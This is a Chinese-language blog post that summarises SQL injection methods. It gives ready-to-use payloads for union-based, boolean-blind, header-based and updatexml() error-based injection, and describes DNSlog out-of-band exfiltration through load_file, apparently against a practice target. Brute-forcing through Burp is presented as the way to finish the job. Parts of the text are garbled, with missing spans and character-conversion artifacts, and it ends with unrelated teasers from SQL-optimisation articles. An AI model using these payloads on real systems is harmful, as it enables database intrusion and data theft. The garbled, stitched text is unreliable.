總結了一下sql幾個注入的基本思路和用法,現來分享一下
如何判斷有無注入: and1=2
步驟:1、找注入點(id=1等等)
2、通過order by 找出一共有多少列數。(報錯數字前乙個)id=1 order by 3 (前面不用加and)
3、利用union select 1,2,3 (一般用null取代)到那個數字 顯示哪個數字證明那個數字是輸出點 id=1 union select 1,2,3 (前面不用加and)
4、把輸出點更換成對應函式測出庫名,表名,字段,資料等
拓展
and 1=2 可更換成 id=1.1/999999 (報錯即可)
limit1,1 第乙個1代表列數,第二個1代表出現多少個結果
通過原始碼判斷是否通過』'或者 ()使語句無效
如果id=『1』 則搭建語句時用 』 union select 1,2,3 — sad
如果是id=(『1』) 則搭建語句時用 』) union select 1,2,3 — sad
如何判斷有無注入sql盲注:同上
就是無法直**到顯示結果,通過對錯判斷是否猜解正確
利用burp爆破猜解
平常語句:
猜庫名:
and (
ascii
(substr
(database()
,1,1
)))=
107 返回正常,說明資料庫名稱第一位是k
猜表名:
and length
((select table_name from information_schema.tables where table_schema=
database
() limit 0,1
))=6 返回正常,說明當前資料庫第乙個表長度是6
and substr
((select table_name from information_schema.tables where table_schema='kanwolongxia
' limit 0,1),1,1)='l' 返回正常,說明資料庫表名的第乙個的第一位是l
猜欄位名:
and substr
((select column_name from information_schema.columns where table_name=
'loflag' limit 0,1
),1,
1)='i' 返回正常,說明loflag表中的列名稱第一位是i
具體步驟就把那幾個輸入改變點的可能字典集放到裡面爆破就完事了
head注入可以利用burp抓包改包,放到repeater去go完事
這裡推薦外掛程式modheader(可以ua、referer、xff注入都可)
直接寫重新整理就行
主要流程**
拓展updatexml() 更新xml文件的函式
語法:updatexml(目標xml內容,xml文件路徑,更新的內容)
updatexml(1,concat(0x7e,(select database()),0x7e),1)
實際上這裡是去更新了xml文件,但是我們在xml文件路徑的位置裡面寫入了子查詢,我們輸入特殊字元,然後就因為不符合輸入規則然後報錯了
但是報錯的時候他其實已經執行了那個子查詢**
使用場景:在某些無法直接利用漏洞獲得回顯的情況下,但是目標可以發起請求,這個時候就可以通過dnslog把想獲得的資料外帶出來
推薦**
利用這個**構建要新增的子網域名稱
像下面:select database()是查詢語句 cp846m.dnslog.cn是子網域名稱(記得前面加點)1.txt不存在只起到查詢作用
查詢語句結果可在該網看到
拓展
load_file:讀取檔案並返回檔案內容為字串
多次查詢同一語句不會改變結果,因為不會重複解析,可以更改子網域名稱或者在前面加.asd.等等
sql經驗總結
最近正在做美女站,經常用到資料庫 1 選擇最有效率的表名順序 只在基於規則的優化器中有效 oracle 的解析器按照從右到左的順序處理 from 子句中的表名,from 子句中寫在最後的表 基礎表 driving table 將被最先處理,在 from 子句中包含多個表的情況下,你必須選擇記錄條數最...
sql優化經驗總結
今天將mysql優化的一些經驗和總結整理一下,方便日後做專案優化sql語句做參考。裡面有我自己的經驗也有從網上直接複製貼上的。1索引問題 在做效能跟蹤分析過程中,經常發現有不少後台程式的效能問題是因為缺少合適索引造成的,有些表甚至乙個索引都沒有。這種情況往往都是因為在設計表時,沒去定義索引,而開發初...
總結 慢 SQL 問題經驗總結
1 導致慢 sql 的原因 在遇到慢 sql 情況時,不能簡單的把原因歸結為 sql 編寫問題 雖然這是最常見的因素 實際上導致慢 sql 有很多因素,甚至包括硬體和 mysql 本身的 bug。根據出現的概率從大到小,羅列如下 sql編寫問題 鎖業務例項相互幹繞對 io cpu 資源爭用 伺服器硬...